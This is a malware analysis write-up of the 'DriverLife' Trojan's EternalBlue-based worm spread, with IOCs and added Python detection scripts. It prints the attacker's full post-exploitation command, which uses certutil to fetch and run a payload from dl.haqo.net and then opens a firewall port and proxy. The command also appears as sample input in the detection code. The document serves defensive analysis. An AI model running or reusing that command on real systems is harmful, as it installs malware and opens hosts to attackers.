
How the “DriverLife” Trojan Leverages EternalBlue for Rapid Worm‑Like Spread

On December 14, Tencent's security intelligence team uncovered a “DriverLife” Trojan that exploited the high‑severity EternalBlue vulnerability to propagate like a worm, infecting up to 100,000 users within two hours, and detailed its infection chain, malicious payloads, and mitigation recommendations.


Overview

On the afternoon of December 14, Tencent Security Threat Intelligence Center detected a surge of a Trojan distributed via the "DriverLife" update channel that also leveraged the high‑severity EternalBlue vulnerability. Within two hours, the malware affected up to 100,000 users, posing a severe threat to enterprise networks.

The Trojan spreads worm‑like across internal networks and subsequently downloads a cloud‑controlled payload, representing a significant information security risk for corporate users.

Detailed Analysis

The malicious executable dtlupg.exe contacts the following URLs to download the payload (characters have been partially obfuscated to prevent direct downloads):

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe
hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

The payload is written to locations such as C:\Program Files (x86)\DTLSoft\iliUpdater\ctrl\f79cb9d2893b254cc75dfb7f3e454a69.exe and later extracts C:\WINDOWS\Temp\svvhost.exe (MD5: 2E9710A4B9CBA3CD11E977AF87570E3B). svvhost.exe contains the EternalBlue exploit tools used for further internal and external propagation.

2.1 Parent Sample (Dropper)

The file F79CB9D2893B254CC75DFB7F3E454A69.exe copies itself to C:\Windows\System32\svhost.exe, installs itself as a service named Ddiver, and launches the cloud‑control module svhhost.exe and the attack module svvhost.exe. It checks a mutex so that an already infected host is not infected again.

2.2 Mining

The cloud‑control Trojan svhhost.exe reads encrypted shellcode from a shared memory segment named HSKALWOEDJSLALQEOD every 2000 seconds, decrypts it, and executes it. The current shellcode primarily performs cryptocurrency mining, but future updates could deliver more damaging payloads such as ransomware.
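As an added example (not Tencent's tool and not code from the write-up), the following Python script checks a host inventory against the artifacts named in the infection chain and in sections 2.1 and 2.2: the drop paths, the MD5 hashes, the Ddiver service name, the HSKALWOEDJSLALQEOD shared memory name, and the svchost.exe lookalike file names. The inventory it runs on is constructed inline; on a real host you would feed it an MD5 export of the file system, the installed service list, and a handle listing of named objects.

```python
"""Host triage against the DriverLife indicators quoted in this write-up.

Added example, not Tencent's detection tool. Indicator values come from the
article; the sample inventory at the bottom is constructed so it runs offline.
"""
import hashlib

# Indicators quoted from the write-up (lower-cased for matching)
IOC_MD5 = {
    "2e9710a4b9cba3cd11e977af87570e3b",
    "74e2a43b2b7c6e258b3a3fc2516c1235",
    "f79cb9d2893b254cc75dfb7f3e454a69",
}
IOC_PATHS = {
    r"c:\windows\system32\svhost.exe",
    r"c:\windows\temp\svvhost.exe",
    r"c:\program files (x86)\dtlsoft\iliupdater\ctrl\f79cb9d2893b254cc75dfb7f3e454a69.exe",
}
IOC_SERVICES = {"ddiver"}
IOC_NAMED_OBJECTS = {"hskalwoedjslalqeod"}  # shared memory segment read by svhhost.exe
# The three components imitate the legitimate svchost.exe name
LOOKALIKE_NAMES = {"svhost.exe", "svhhost.exe", "svvhost.exe"}


def md5_of_bytes(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def md5_of_file(path: str) -> str:
    """MD5 of a file on disk, read in chunks so large binaries are fine."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def triage(file_hashes, services, named_objects):
    """Return (finding_kind, item) tuples for every indicator that matches.

    file_hashes:   {path: md5hex}, e.g. exported with Get-FileHash -Algorithm MD5
    services:      installed service names
    named_objects: names of sections / mutexes taken from a handle listing
    """
    findings = []
    for path, digest in file_hashes.items():
        norm = path.lower()
        if norm in IOC_PATHS:
            findings.append(("known_path", path))
        if digest.lower() in IOC_MD5:
            findings.append(("known_hash", path))
        if norm.rsplit("\\", 1)[-1] in LOOKALIKE_NAMES:
            findings.append(("svchost_lookalike", path))
    findings += [("known_service", s) for s in services if s.lower() in IOC_SERVICES]
    findings += [("known_named_object", o) for o in named_objects
                 if o.lower() in IOC_NAMED_OBJECTS]
    return findings


# Constructed inventory standing in for a real host export
SAMPLE_HASHES = {
    r"C:\Windows\System32\svchost.exe": "00000000000000000000000000000000",  # placeholder, legit binary
    r"C:\Windows\System32\svhost.exe": "F79CB9D2893B254CC75DFB7F3E454A69",
    r"C:\WINDOWS\Temp\svvhost.exe": "2E9710A4B9CBA3CD11E977AF87570E3B",
}
SAMPLE_SERVICES = ["Dhcp", "Ddiver", "Dnscache"]
SAMPLE_OBJECTS = ["HSKALWOEDJSLALQEOD"]

if __name__ == "__main__":
    for kind, item in triage(SAMPLE_HASHES, SAMPLE_SERVICES, SAMPLE_OBJECTS):
        print(f"{kind:20} {item}")
```

Path and name matching is case-insensitive because Windows paths are; the lookalike check is deliberately broader than the hash list so a recompiled sample with a new MD5 but the same file name still surfaces for review.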

2.3 Attack Module

The attack module downloads eb.exez from hxxp://dl.haqo.net/eb.exez and runs it as Svvhost.exe. Analysis shows it is a Python‑based compressed package of the EternalBlue exploit. The module also includes Mysmb.pyo, which scans internal networks on port 445 and attempts to compromise both internal and external IPs, pausing 20 minutes after each attack.

Successful exploitation executes the following command on the compromised host, which downloads and runs an additional payload via certutil, opens TCP port 65531 in the Windows firewall, and adds a port proxy forwarding that port to 1.1.1.1:53:

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
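The command above leaves two kinds of evidence a defender can look for: the process command line itself (Sysmon event 1 or Windows event 4688) and the portproxy entry that persists after the shell exits. As an added example that is not part of the original write-up, the Python below tags a command line for the certutil download, the firewall portopening and the portproxy add, matches any embedded URL against the article's IOC domains, and parses the table printed by `netsh interface portproxy show v4tov4` to find the 65531 listener. The command line and the netsh output it runs on are constructed from what the article quotes; the rule that flags any forward to port 53 on a non-loopback address is my own generalisation of the single entry the article shows.

```python
"""Detection logic for the post-exploitation command and port-proxy persistence.

Added example, not code from the write-up. Sample inputs are constructed.
"""
import re
from urllib.parse import urlparse

# Domains from the article's IOC list; suffix matching also covers xxxx.update.ackng.com
IOC_DOMAINS = {"i.haqo.net", "dl.haqo.net", "update.ackng.com"}
IOC_PORTPROXY_LISTEN = 65531

# URLs are cut at '&' because cmd.exe uses it to chain commands (query strings would be truncated)
URL_RE = re.compile(r"https?://[^\s&\"']+", re.IGNORECASE)
PORTPROXY_ROW = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def is_ioc_domain(host: str) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def inspect_cmdline(cmd: str) -> list:
    """Tag one process command line; each '&'-chained segment is examined on its own."""
    tags = []
    for seg in (s.strip() for s in cmd.split("&")):
        if not seg:
            continue
        tokens = seg.lower().split()
        for url in URL_RE.findall(seg):
            host = urlparse(url).hostname or ""
            if is_ioc_domain(host):
                tags.append("ioc_domain:" + host)
        # certutil -urlcache -f <url> <file> abuses the certificate tool as a downloader
        if any(t.endswith(("certutil", "certutil.exe")) for t in tokens) \
                and "-urlcache" in tokens and "-f" in tokens:
            tags.append("certutil_download")
        if "netsh" in tokens and "portopening" in tokens:
            tags.append("netsh_firewall_portopening")
        if "netsh" in tokens and "portproxy" in tokens and "add" in tokens:
            tags.append("netsh_portproxy_add")
    return tags


def parse_portproxy(show_output: str) -> list:
    """Parse the table printed by `netsh interface portproxy show v4tov4`."""
    rows = []
    for line in show_output.splitlines():
        m = PORTPROXY_ROW.match(line)
        if m:  # header and separator lines have no numeric port column, so they never match
            rows.append({"listen_addr": m.group(1), "listen_port": int(m.group(2)),
                         "connect_addr": m.group(3), "connect_port": int(m.group(4))})
    return rows


def suspicious_portproxy(rows: list) -> list:
    """The article's 65531 listener, plus (my generalisation) any forward to port 53
    on a non-loopback address."""
    return [r for r in rows
            if r["listen_port"] == IOC_PORTPROXY_LISTEN
            or (r["connect_port"] == 53 and not r["connect_addr"].startswith("127."))]


# Constructed from the command quoted in the article
ARTICLE_CMD = ("cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe"
               "&c:/install.exe&netsh firewall add portopening tcp 65531 DNS"
               "&netsh interface portproxy add v4tov4 listenport=65531 "
               "connectaddress=1.1.1.1 connectport=53")

# Constructed in the layout netsh prints; the second row is a benign example
PORTPROXY_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               65531       1.1.1.1         53
127.0.0.1       8080        10.0.0.5        80
"""

if __name__ == "__main__":
    print(inspect_cmdline(ARTICLE_CMD))
    print(suspicious_portproxy(parse_portproxy(PORTPROXY_OUTPUT)))
```

The tags are deliberately independent: a certutil download without the IOC domain, or a portproxy add on its own, is still worth a look, and each tag maps cleanly onto a separate detection rule in a SIEM.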

Security Recommendations

1. Temporarily close unnecessary ports on servers (e.g., 135, 139, 445).
2. After the weekend, corporate users should run Tencent's threat‑detection tool to clean infections and apply vulnerability patches via its built‑in patch‑repair function.
3. Enforce strong passwords and avoid weak credentials.
4. Deploy reputable antivirus solutions to block potential attacks.
5. Consider deploying Tencent's advanced threat detection system, which leverages cloud and endpoint data for comprehensive threat intelligence.

IOCs

Domains
i.haqo.net
dl.haqo.net

MD5 hashes
2e9710a4b9cba3cd11e977af87570e3b
74e2a43b2b7c6e258b3a3fc2516c1235
f79cb9d2893b254cc75dfb7f3e454a69

URLs
hxxp://dl.haqo.net/eb.exez
hxxp://i.haqo.net/i.png?ID=xxxxx
Written by

Efficient Ops
